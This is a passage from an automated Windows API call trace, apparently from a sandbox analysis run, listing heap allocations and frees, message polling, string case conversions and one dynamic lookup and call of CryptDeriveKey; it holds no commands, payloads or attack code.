(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.304] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.304] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.304] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.305] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.305] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.306] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.306] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.307] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0161.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa688, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0161.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.310] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.310] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: 